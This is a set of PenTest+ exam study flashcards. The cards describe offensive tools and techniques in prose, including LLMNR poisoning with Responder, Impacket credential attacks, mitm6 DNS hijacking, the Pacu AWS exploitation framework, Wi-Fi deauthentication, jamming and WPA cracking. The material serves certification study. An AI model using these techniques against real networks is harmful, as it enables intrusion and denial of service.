PenTest+ Study Notes 9 Flashcards
??? is a on-path type tool that can be used to exploit name resolution on a Windows network. It is designed to intercept and poison LLMNR and NBT-NS requests. Once a request is intercepted, ??? will return the attacker’s host IP as the name record, causing the querying host to establish a session with the attacker.
??? is the act of using multiple exploits to form a larger attack.
** Armitage / Cobalt Strike (learn these tools) **
Responder / Exploit chaining
??? is an open-source collection of tools used when PenTesting in a Windows environment. The ??? library provides methods for several attacks such as an NTLM and Kerberos authentication attacks, pass the hash, credential dumping, and packet sniffing.
Impacket tools :
??? is an IPv6 DNS hijacking tool that works by first replying to DHCPv6 messages that set the malicious actor as DNS server. It will then reply to DNS queries with bogus IP addresses that redirect the victim to another malicious host. Exploit Database (Exploit DB) which provides a complete collection of public exploits and vulnerable software in a searchable database. To search Exploit DB, the team can use SearchSploit , a tool included in the exploitdb package on Kali Linux.
mitm6 :
??? are referred to as buckets. A container is created within a specific region and cannot be nested within another container. Each container can host data objects, which is the equivalent of files in a local file system. In addition, a container can have customizable metadata attributes.
Cloud storage containers :
Another vulnerable account is a shared account, which can exist when the password or another authentication credential is shared with more than one person. A shared account can be used in a small office home office (SOHO) environment, as many SOHO networking devices do not allow you to create multiple accounts. As a result, a single “Admin” account is used to manage the device. A shared account should be avoided, as it breaks the principle of nonrepudiation and makes an accurate audit trail difficult to establish.
In a D2O attack, malicious actors circumvent this protection by identifying the origin network or IP address, and then launching a direct attack.
info
??? is an open-source tool written in Python that can be used to audit instances and policies created on multicloud platforms, such as AWS, Microsoft Azure, and Google Cloud. ??? collects data from the cloud using API calls. It then compiles a report of all the objects discovered, such as VM instances, storage containers, IAM accounts, data, and firewall ACLs.
??? is an audit tool for use with Amazon Web Services only. It can be used to evaluate cloud infrastructure against the Center for Internet Security (CIS) benchmarks for AWS, plus additional GDPR and HIPAA compliance checks.
??? is designed as an exploitation framework to assess the security configuration of an AWS account. It includes several modules so the team can attempt exploits such as obtaining API keys or gaining control of a VM instance.
ScoutSuite / Prowler / Pacu
??? is an open-source cloud security, governance, and management tool designed to help the administrator create policies based on resource types. When run, you’ll be able to see which resources will leave you vulnerable then enforce policies to automatically correct the vulnerabilities.
??? can : Notify users in real time if mistakes are made. Ensure compliance in terms of encryption, access requirements, and backups. Shut down during off hours and manage garbage collection. In addition, you can apply specific actions such as terminating or suspending incidents based on the filters you set.
Cloud custodian :
??? features the Temporal Key Integrity Protocol (TKIP). TKIP dynamically generates a new 128-bit key for each packet. In addition, ??? includes a Message Integrity Check (MIC), which provides a stronger method (than a CRC) to ensure data integrity.
??? is an improvement of WPA and replaced RC4 and TKIP with Counter Mode CBC-MAC Protocol (CCMP) using AES.
??? includes advanced features to secure wireless transmissions such as 192-bit encryption when using ???-Enterprise mode (used in business LANs). It also features improved authentication, employs a 48-bit initialization vector, and uses Protected Management Frames (PMFs) to prevent exposure of management traffic.
WPA / WPA2 / WPA3
deAuth : You can use airodump-ng to sniff for the handshake, with aireplay-ng you can either deauthenticate a single client or all clients on a WAP.
Jamming is an attack that disrupts a Wi-Fi signal by broadcasting on the same frequency as the target WAP, and any signals that a wireless transceiver is attempting to send or receive will be blocked. Physical jamming devices can send disruptive signals to several wireless devices in a targeted area. By jamming a Wi-Fi signal, a malicious actor can trigger a denial of service (DoS) and disrupt the flow of communications.
To launch a jamming attack, a malicious actor can either use a physical device or software jammer. For example, wifi jammer is a Python script that can jam (or disrupt) the signals of all WAPs in an area. You can also use wifi jammer to perform more targeted attacks to disable only select Wi-Fi networks in an area, or even specific clients.
info
WPA/WPA2 : If you have managed to grab the password hashes during the handshake, you can use dictionary-based and brute force methods to try to crack the password offline.
When using WPA, the use of rotating keys and sequence numbers can make a cracking attempt more difficult. However, WPA is still susceptible to dictionary attacks if a weak passkey has been chosen. When using WPA2, an attack might be possible by launching a key reinstallation attack (KRACK), which can intercept and manipulate the WPA2 4-way handshake.
info
